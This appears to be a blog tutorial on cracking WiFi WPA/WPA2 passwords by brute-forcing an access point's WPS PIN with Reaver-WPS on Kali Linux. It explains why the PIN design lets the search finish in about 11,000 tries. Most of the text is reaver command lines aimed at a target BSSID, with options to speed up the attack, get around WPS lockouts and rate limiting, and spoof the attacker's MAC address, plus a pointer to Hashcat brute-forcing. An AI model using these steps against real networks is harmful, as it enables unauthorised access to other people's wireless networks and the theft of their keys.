Cracking Wifi WPA/WPA2

passwords using Reaver-WPS

Overview:
Reaver-wps performs a brute force attack against an access points WiFi
Protected Setup pin number. Cracking Wifi WPA WPA2 passwords using
Reaver-WPS - blackMORE OpsOnce the WPS pin is found, the WPA PSK can be
recovered and alternately the APs wireless settings can be reconfigured. This
post outlines the steps and command that helps cracking Wifi WPA/WPA2
passwords using Reaver-WPS.

While Reaver-wps does not support reconfiguring the AP, this can be
accomplished with wpa_supplicant once the WPS pin is known.

Readers, note that Ive since written another post where I could crack a
password in 14.21 seconds. using pyrit cowpatty and WiFite combination
attack with dictionary.The whole process takes less than 10 minutes.

Those who would like to try more ways of cracking Wifi WPA WPA2 passwords,
you can also use HashCat or cudaHashcat or oclHashcat to crack your
unknown Wifi WPA WPA2 passwords. The benefit of using Hashcat is, you can
create your own rule to match a pattern and do a Brute-force attack. This is
an alternative to using dictionary attack where dictionary can contain only
certain amount of words but a brute-force attack will allow you to test every
possible combinations of given charsets. Hashcat can crack Wifi WPA/WPA2
passwords and you can also use it to crack MD5, phpBB, MySQL and SHA1
passwords. Using Hashcat is an good option as if you can guess 1 or 2
characters in a password, it only takes few minutes. For example: if you know
3 characters in a password, it takes 12 minutes to crack it. If you know 4
characters in a password, it takes 3 minutes. You can make rules to only try
letters and numbers to crack a completely unknown password if you know a
certain Routers default password contains only those. Possibilities of cracking
is a lot higher in this way.

Important Note: Many users try to capture with network cards that are not
supported. You should purchase a card that supports Kali Linux including

injection and monitor mode etc. A list can be found in 802.11 Recommended
USB Wireless Cards for Kali Linux. It is very important that you have a
supported card, otherwise youll be just wasting time and effort on something
that just wont do the job.

Contents [hide]
Overview:
Description:
Installation:
Usage:
More on Basic Usages
Speeding Up the Attack
MAC Spoofing
Supported Wireless Drivers
Partially Supported
Not Supported
Conclusion
Related Articles
Description:
Reaver-wps targets the external registrar functionality mandated by the WiFi
Protected Setup specification. Access points will provide authenticated
registrars with their current wireless configuration (including the WPA PSK),
and also accept a new configuration from the registrar.

In order to authenticate as a registrar, the registrar must prove its knowledge

of the APs 8-digit pin number. Registrars may authenticate themselves to an
AP at any time without any user interaction. Because the WPS protocol is
conducted over EAP, the registrar need only be associated with the AP and
does not need any prior knowledge of the wireless encryption or
configuration.

Reaver-wps performs a brute force attack against the AP, attempting every
possible combination in order to guess the APs 8 digit pin number. Since the
pin numbers are all numeric, there are 10^8 (100,000,000) possible values
for any given pin number. However, because the last digit of the pin is a
checksum value which can be calculated based on the previous 7 digits, that
key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further due to the fact that the WPS
authentication protocol cuts the pin in half and validates each half
individually. That means that there are 10^4 (10,000) possible values for the
first half of the pin and 10^3 (1,000) possible values for the second half of
the pin, with the last digit of the pin being a checksum.

Reaver-wps brute forces the first half of the pin and then the second half of
the pin, meaning that the entire key space for the WPS pin number can be
exhausted in 11,000 attempts. The speed at which Reaver can test pin
numbers is entirely limited by the speed at which the AP can process WPS
requests. Some APs are fast enough that one pin can be tested every second;
others are slower and only allow one pin every ten seconds. Statistically, it
will only take half of that time in order to guess the correct pin number.

Installation:
Install Kali Linux, everything built into it. (Reaver-wps, libpcap and libsqlite3)

Usage:
Usually, the only required arguments to Reaver-wps are the interface name
and the BSSID of the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05

The channel and SSID (provided that the SSID is not cloaked) of the target AP
will be automatically identified by Reaver-wps, unless explicitly specified on
the command line:

# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

By default, if the AP switches channels, Reaver-wps will also change its

channel accordingly. However, this feature may be disabled by fixing the
interfaces channel:

# reaver -i mon0 -b 00:01:02:03:04:05 --fixed

The default receive timeout period is 5 seconds. This timeout period can be
set manually if necessary (minimum timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

The default delay period between pin attempts is 1 second. This value can be
increased or decreased to any non-negative integer value. A value of zero
means no delay:

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Some APs will temporarily lock their WPS state, typically for five minutes or
less, when suspicious activity is detected. By default when a locked state is
detected, Reaver-wps will check the state every 315 seconds (5 minutes and
15 seconds) and not continue brute forcing pins until the WPS state is
unlocked. This check can be increased or decreased to any non-negative
integer value:

# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

For additional output, the verbose option may be provided. Providing the
verbose option twice will increase verbosity and display each pin number as it
is attempted:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

The default timeout period for receiving the M5 and M7 WPS response
messages is .1 seconds. This timeout period can be set manually if necessary
(max timeout period is 1 second):

# reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Some poor WPS implementations will drop a connection on the floor when an
invalid pin is supplied instead of responding with a NACK message as the
specs dictate. To account for this, if an M5/M7 timeout is reached, it is treated
the same as a NACK by default. However, if it is known that the target AP
sends NACKS (most do), this feature can be disabled to ensure better
reliability. This option is largely useless as Reaver-wps will auto-detect if an
AP properly responds with NACKs or not:

# reaver -i mon0 -b 00:01:02:03:04:05 --nack

While most APs dont care, sending an EAP FAIL message to close out a WPS
session is sometimes necessary. By default this feature is disabled, but can
be enabled for those APs that need it:

# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

When 10 consecutive unexpected WPS errors are encountered, a warning
message will be displayed. Since this may be a sign that the AP is rate
limiting pin attempts or simply being overloaded, a sleep can be put in place
that will occur whenever these warning messages appear:

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

More on Basic Usages
First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of
the monitor mode interface (usually mon0, not wlan0, although this will
vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reavers
progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack
By default, Reaver-wps has a 1 second delay between pin attempts. You can
disable this delay by adding -d 0 on the command line, but some APs may
not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is dh-small. This option instructs
Reaver to use small diffie-hellman secret numbers in order to reduce the
computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver
supports MAC spoofing with the mac option, but you must ensure that you
have spoofed your MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically
named mon0) WILL NOT WORK. You must change the MAC address of your
wireless cards physical interface. For example:

# ifconfig wlan0 down

# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Supported Wireless Drivers
The following wireless drivers have been tested or reported to work
successfully with Reaver-wps:

ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
Partially Supported

The following wireless drivers have had mixed success, and may or may not
work depending on your wireless card (i.e., if you are having problems with
these drivers/cards, consider trying a new card before submitting a trouble
ticket):

ath5k
iwlagn
rtl2800usb (using the latest compat-wireless drivers has fixed many user's
problems, hint hint...)
b43
Not Supported

The following wireless drivers/cards have been tested or reported to not work
properly with Reaver:

iwl4965
RT3070L
Netgear WG111v3
Conclusion
If you want to Pentest or Hack your Wifi Passwords, then the first thing you
need is a compatible Wifi card. Most Wifi cards are priced between 15$-35$

USD.I see no point struggling with an unsupported card when you can just
invest that extra bucks and that card will last you years. You get to learn how
to pentest or hack Wifi passwords, how to Inject, spoof, setup fake AP or
Honeypot. See the list of supported USB Wifi adapter cards that works in Kali
Linux and are available in Amazon.